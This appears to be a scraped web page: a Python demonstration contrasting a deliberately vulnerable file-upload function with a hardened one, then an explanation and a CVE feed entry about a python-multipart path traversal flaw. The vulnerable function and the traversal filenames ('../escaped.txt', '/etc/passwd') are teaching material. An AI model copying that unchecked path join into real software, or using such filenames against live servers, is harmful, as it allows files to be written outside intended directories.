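import tempfile


def store_vulnerable(upload_dir: str, filename: str, data: bytes) -> str:
    """UPLOAD_KEEP_FILENAME=True style: the client's name is joined as-is,
    so '../x' walks out of upload_dir and '/etc/x' replaces it entirely."""
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as f:
        f.write(data)
    return path


def safe_upload_path(upload_dir: str, filename: str) -> str:
    """Keep only the last path component and prove the result is inside
    upload_dir after symlink resolution."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # strip dirs, either separator
    if name in ("", ".", "..") or "\0" in name:
        raise ValueError("unsafe filename")
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes upload dir")
    return target


def store_hardened(upload_dir: str, filename: str, data: bytes) -> str:
    path = safe_upload_path(upload_dir, filename)
    with open(path, "wb") as f:
        f.write(data)
    return path


def is_rejected(upload_dir: str, filename: str) -> bool:
    try:
        safe_upload_path(upload_dir, filename)
        return False
    except ValueError:
        return True


def demo(filename: str = "../escaped.txt") -> dict:
    """Write the same client filename through both paths under a throwaway
    root and report where each file actually landed."""
    root = tempfile.mkdtemp()
    upload_dir = os.path.join(root, "uploads")
    os.mkdir(upload_dir)
    base = os.path.realpath(upload_dir)
    vuln = os.path.realpath(store_vulnerable(upload_dir, filename, b"x"))
    safe = os.path.realpath(store_hardened(upload_dir, filename, b"x"))
    return {
        "vulnerable_inside": os.path.commonpath([base, vuln]) == base,
        "hardened_inside": os.path.commonpath([base, safe]) == base,
        "vulnerable_path": vuln,
        "hardened_path": safe,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two details are easy to get wrong: `os.path.join` discards everything before an absolute second argument, so a filename of `/etc/passwd` is not a traversal but a full replacement; and a basename check alone does not cover a symlinked upload directory, which is why the resolver compares `realpath` results rather than the strings it was given.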

Statistics

  • 2 Posts

Last activity: 5 hours ago

Fediverse

🟠 CVE-2026-24486 - High (8.6)

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 1
  • 5h ago